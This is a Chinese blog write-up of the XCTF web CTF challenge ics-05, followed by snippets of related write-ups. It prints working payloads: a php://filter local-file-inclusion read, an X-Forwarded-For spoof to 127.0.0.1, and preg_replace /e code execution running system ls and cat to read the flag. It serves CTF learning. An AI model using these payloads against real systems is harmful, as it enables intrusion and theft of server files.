攻防世界web进阶ics-05 详细wp

最新推荐文章于 2024-08-08 23:23:12 发布
最新推荐文章于 2024-08-08 23:23:12 发布
阅读量4.7k 收藏 21
点赞数 8
文章标签: 攻防世界 web进阶
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhwho/article/details/100694073
版权

攻防世界web进阶区ics-05 wp

题目网站


根据题目提示选择设备维护中心,或者简单粗暴的全都点一遍,发现也只有设备维护中心能点开

打开后 F12 调网页源码 查看后发现
在这里插入图片描述
?page=index 有page这个get参数
自然联想到可能存在利用文件包含读取网页源码的漏洞
这里给出利用php内置filter协议读取文件的代码

?page=php://filter/read=convert.base64-encode/resource=index.php

利用网页中自带的page传参漏洞?page=
代码的后半段参考另一个博主对于LFI读取php源码的解释
点这查看解释

查看网页得到base64加密后的代码

在这里插入图片描述
放到base64解密里得到php代码


if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

代码审计得

(1)需要在html的头格式中伪造 IP : 127.0.0.1

这里用burpsuite伪造IP
在这里插入图片描述
出现 Welcome My Admin! 证明伪造成功

(2)接下来是最关键的利用preg_replace()函数的/e漏洞进行代码执行

首先简单介绍一下preg_replace()函数

preg_replace($pattern, $replacement, $subject)
作用:搜索subject中匹配pattern的部分, 以replacement的内容进行替换。
$pattern:       要搜索的模式,可以是字符串或一个字符串数组。
$replacement:   用于替换的字符串或字符串数组。
$subject:       要搜索替换的目标字符串或字符串数组。

接着关于/e漏洞

/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向
引用替换完之后)。
提示:要确保 replacement 构成一个合法的 PHP 代码字符串,
否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。

也就是说只要在subject中有要搜索的pattern的内容,同时将在replacement前加上/e,触发/e漏洞,就可以执行replacement中的正确的php代码

后面就是利用这个漏洞去进行文件读取,找到关于flag的线索

第一步尝试使用 system(“ls”) 获取文件目录
在这里插入图片描述
成功读取文件目录,同时发现目录下的 s3chahahaDir 文件的名字很可疑
想到进入该文件中查看内容

第二步 cd 到 s3chahahaDir 这个文件夹下查看内容
cd命令为 system("cd%20s3chahahaDir%26%26%20ls")
解释一下,%20代表空格,%26%26就是&&代表当前面命令执行成功时,继续执行后面的命令,读取s3chahahaDir文件夹内容。于是有
在这里插入图片描述
发现flag文件,猜想大概率正确
再使用刚刚的 cd命令 system("cd%20s3chahahaDir/flag%26%26%20ls")
查看flag文件的内容

发现flag.php
最后使用cat命令读取flag.php中的内容
命令代码:system("cat%20s3chahahaDir/flag/flag.php")
得到flag
在这里插入图片描述

知识点总结:

(1)利用php内置filter协议读取文件的代码
(2)伪造IP
(3)preg_replace()函数的/e漏洞
(4)正确的php system()函数的书写

2hwh0
关注
攻防世界(web篇)---ics-05
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-16 1316
根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数 不可行读取源码看看直接包含发现会直接运行php文件,那我们怎么获得源码呢,很简单,include函数只会将php文件进行执行,我们只需要将传进去的文件先进行base64编码再传给它,就会输出它的内容了,也就是源码: $_SERVER[‘HTTP_X_FORWARDED_FOR’] 这个需要请求加 preg_replace /e参数
[wp] 攻防世界 ics-05
MercyLin的博客
09-06 1287
进入题目发现也只有设备维护中心的选项可以点 page传的参数在页面会有回显,fuzz一下:
攻防世界web进阶ics-05
最新发布
m0_52484587的博客
08-08 959
(1)利用php内置filter协议读取文件的代码(2)伪造IP(3)preg_replace()函数的/e漏洞(4)正确的php system()函数的书写。
攻防世界 ics-05 wp
freerats的博客
06-04 317
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 打开设备维护中心页面上没什么,查看源码发现?page=index 看到这个可能存在文件包含读源码的漏洞 php://filter/read=convert.base64-encode/resource=index.php 使用php协议读取index.php页面的base64格式,解码即可得到源码 源码比较长,核心部分就是以下这一段 这里的主要考点就是preg_replace()命令执行漏洞 官方的解释是 mixed preg_replac
攻防世界——ics-05
m0_62063669的博客
06-21 2337
攻防世界——ics-05,打开题目场景,进入设备维护中心,将所有可点击的地方都点了一遍,发现只有设备维护中心可以打开在源代码中发现page=index写入参数,参数会在页面中显示有参数的话,可以尝试以下XSS(没有任何反应,失败)LFI(Local File Inclusion) 本地文件包含漏洞,指的是能打开并包含本地文件的漏洞 LFI漏洞的黑盒判断方法:如果只从URL判断,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键词,就可能存在文件包含漏洞。..
攻防世界-web-ics-05
wuh2333的博客
07-12 489
攻防世界ics命令注入
攻防世界-ics-05
weixin_46784800的博客
11-24 2791
ics-05题php伪协议题目分析:preg_replace函数漏洞: php伪协议 常用方式: ?file=php://filter/read=convert.base64-encode/resource=index.php 用来查看index.php的源码。 题目分析: 进入后,点击设备维护中心(只有这一个可以点) 查看源代码,可以看见存在一个参数为page,就在“云平台设备维护中心”: 点击该处即可发现自己发现了新世界: 首先判断是否存在文件包含漏洞: /index.php?page={{1+
攻防世界 web 进阶 ics-07
weixin_42499640的博客
08-11 4605
工控云管理系统项目管理页面解析漏洞 /index.php 看到view-source 看一下源码 <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(pre...
攻防世界web进阶ics-05
gongjingege的博客
07-29 396
打开链接 看了看源代码,没发现啥,页面到处点点,只有设备维护中心可以进去 再点了一下云平台设备维护中心,发现url栏?page=index url栏看见page,考虑文件包含漏洞 读取index的源代码,参考大佬的wp,用php伪协议php://filter payload:?page=php://filter/read=convert.base64-encode/resource=index.php 得到一段base64,解码 https://tool.chinaz.com/tools/base64.
攻防世界web进阶ics-06
gongjingege的博客
07-09 1016
打开链接 到处点了点,发现只有题目描述里的报表中心可以点进去 发现id=1,改了几个数字,发现页面没有变化,看了看源代码,用开发者选项也没有发现,试了试burpsuite抓包,也没发现啥 到网上看了看各位大佬的wp,发现这个题得用burp suite爆破(触及到了我的盲区。。。),只能看着大佬的博客,一步步跟着来 抓包后发送给intruder,查看target是否正确,导入字典点击右上角的start attack,开始爆破(发现我的字典里没有2333,刚开始没成功,在字典里加入后才成),点击length自
攻防世界 web高手进阶区 6分题(ics-07、unfinish、i-got-id-200)
闵行小鱼塘
08-02 850
继续ctf的旅程,攻防世界web高手进阶区的6分题:ics-07、unfinish、i-got-id-200
攻防世界-web进阶
楼阁de猫的博客
10-30 974
目录baby_webTraining-WWW-Robots baby_web 题目描述:想想初始页面是哪个 打开链接看到这个界面 这里有两种解法 法一:我们输入index.php ,就会立即跳转到1.php 那我们就对index.php抓包看看 在请求头看到flag:flag{very_baby_web} 法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到 Training-WWW-Robots 打开链接是这样一个
攻防世界-ics-05
m0_62094846的博客
11-17 2158
点开后发现只有设备维护中心可以点开 看到数据端口请求异常,先想到用burp修改域名,但是修改后 除了加了一句话没什么用 看看源代码,有page=index(看wp的,真想不到和文件包含有关) ?page=php://filter/read=convert.base64-encode/resource=index.php 应该是base64 <?php error_reporting(0); @session_start(); posix_setuid(1...
攻防世界 ics-05
m0_54110873的博客
06-28 665
攻防世界ics-05复现~~~~
攻防世界ics-05
wangzhemvp的博客
04-05 686
提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。使用 /e 修饰符,preg_replace 会将 replacement 参数当作 PHP 代码执行。php://filter 伪协议查看源码 + preg_replace 函数漏洞。1.获取网页源代码。多点点界面,发现点云平台设备维护中心时,页面发生变化。page=index 输入什么显示什么,有回显。用php://filter读取网页源代码。
攻防世界web进阶ics-05详解
hxhxhxhxx的博客
08-06 3265
攻防世界web进阶ics-05详解题目解法 题目 我们只能点击一个地方 解法 御剑扫描有一个css的文件 没有什么作用 发现又点了一次的时候,url发生了改变 因为是php的页面,我们试试php伪协议读取文件 http://220.249.52.133:39554/index.php?page=php://filter/read=convert.base64-encode/resource=index.php <?php error_reporting(0); @session_s
攻防世界-web ics-05
m0_48108919的博客
02-19 2426
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 逐个点击菜单栏,发现只有设备维护中心有跳转 题目提示了利用后门入侵,首先使用dirsearch扫描网站目录,发现有个/index.php/login目录 尝试访问,发现页面有超链接,尝试点击 发现page的参数会原样输出 尝试使用php伪协议读取文件: php伪协议参考:https://www.cnblogs.com/endust/p/11804767.html 构造payload读取index.php..
攻防世界ics-05(PHP伪协议+代码审计+Linux指令)
2302_79800344的博客
04-08 1470
它表示在执行替换时将替换字符串作为 PHP 代码进行评估和执行。修饰符在 PHP 中已经被废弃。
XCTF攻防世界webics-05(含自动化脚本)
weixin_50464560的博客
02-10 906
一、手解 本文借鉴以下两篇文章的指导 https://www.jianshu.com/p/5a502873635b https://blog.csdn.net/about23/article/details/95349625   全部点击一遍,只有这个可以有其他界面   题目描述是 “其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统” 在后面添加login.php 无果,御剑扫描也无结果,源码也找不到其他东西 再次点击上面的“云平台设备维
web-ics-05
07-28
对于题目"web-ics-05",根据提供的引用内容,我们可以得到以下信息: - 这道题可能是在入侵后利用管理平台来完成一些信息的收集,读取文件并利用是非常重要的。\[1\] - 在源代码中有一段注释,提到要给HTTP头部添加X-forwarded-For=127.0.0.1。\[2\] - preg_replace函数可以执行正则表达式的搜索和替换。\[3\] 根据这些信息,我们可以推测"web-ics-05"可能是一道关于入侵和利用管理平台的题目,要求读取文件并进行一些操作,同时还需要使用preg_replace函数进行正则表达式的搜索和替换。具体的题目要求和操作细节可能需要进一步的信息才能确定。 #### 引用[.reference_title] - *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [攻防世界-ics-05-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125291336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值